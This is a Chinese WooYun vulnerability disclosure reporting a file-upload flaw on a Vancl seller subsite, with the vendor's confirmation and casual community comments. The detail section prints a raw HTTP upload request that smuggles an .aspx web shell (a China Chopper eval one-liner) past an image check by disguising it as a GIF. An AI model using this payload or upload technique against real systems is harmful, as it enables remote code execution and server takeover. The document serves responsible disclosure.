凡客某分站任意文件上传

漏洞概要

缺陷编号:WooYun-2012-011567

漏洞标题:凡客某分站任意文件上传

相关厂商:凡客诚品

漏洞作者:Jannock

提交时间:2012-08-30 19:36

公开时间:2012-10-14 19:36

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2012-08-30: 细节已通知厂商并且等待厂商处理中
2012-08-31: 厂商已经确认,细节仅向厂商公开
2012-09-10: 细节向核心白帽子及相关领域专家公开
2012-09-20: 细节向普通白帽子公开
2012-09-30: 细节向实习白帽子公开
2012-10-14: 细节向公众公开

简要描述:

凡客某分站任意文件上传

详细说明:

分站地址:http://seller.vancl.com/account/UserAccountview账户认证功能在上传那里上传,抓包,改包上传。。。成功。。POST /account/UploadIdImage HTTP/1.1Host: seller.vancl.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.5Connection: keep-aliveReferer: http://seller.vancl.com/account/UserAccountviewCookie: 自己加上Content-Type: multipart/form-data; boundary=---------------------------146043902153Content-Length: 367-----------------------------146043902153Content-Disposition: form-data; name="ufile"; filename="xxx.aspx"Content-Type: image/gifGIF89a<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>-----------------------------146043902153Content-Disposition: form-data; name="SubmitID"... ...-----------------------------146043902153--

漏洞证明:

修复方案:

部署还可以,分离了。文件应该是同步过来的,所以shell我清除不了,你们删除一下吧。。

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-08-31 16:57

厂商回复:

非常感谢,已提交开发人员进行整改。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @_@

  2. 2010-01-01 00:00 风萧萧 白帽子 | Rank:874 漏洞数:67)

    神啊

  3. 2010-01-01 00:00 goderci 白帽子 | Rank:522 漏洞数:47)

    我猜是校园招聘神马的...洞主专业研究文件上传30年

  4. 2010-01-01 00:00 不懂xx 白帽子 | Rank:22 漏洞数:5)

    @goderci 这么深的功力,佩服楼主

  5. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    @goderci 赌十个WB

  6. 2010-01-01 00:00 goderci 白帽子 | Rank:522 漏洞数:47)

    @xsser 等我回去研究下再来赌,WB很金贵的

  7. 2010-01-01 00:00 Eoh 白帽子 | Rank:269 漏洞数:28)

    @xsser 洞主时不时会出来活动下,每次上线都会招人围观。

  8. 2010-01-01 00:00 P1n9y_fly 白帽子 | Rank:97 漏洞数:11)

    @xsser 必胜- -。。。

  9. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    1WB 不是9块钱么?

  10. 2010-01-01 00:00 gainover 白帽子 | Rank:1331 漏洞数:97)

    嘿嘿,凡客送乌云此贴每人一件29的T恤吧~~~

  11. 2010-01-01 00:00 goderci 白帽子 | Rank:522 漏洞数:47)

    @Jannock @xsser 上次搭配图?或者某活动频道?送你十WB

  12. 2010-01-01 00:00 zeracker 白帽子 | Rank:1028 漏洞数:134)

    凡客应该捐赠乌云套装。

  13. 2010-01-01 00:00 一刀终情 白帽子 | Rank:154 漏洞数:27)

    我来跟着一哥混T恤的

  14. 2010-01-01 00:00 Passer_by 白帽子 | Rank:94 漏洞数:18)

    哪里可以看见wb多少

  15. 2010-01-01 00:00 Night 白帽子 | Rank:55 漏洞数:15)

    我觉得吧 应该送个乌云战袍

  16. 2010-01-01 00:00 小胖子 白帽子 | Rank:1429 漏洞数:107)

    各种赠送战袍!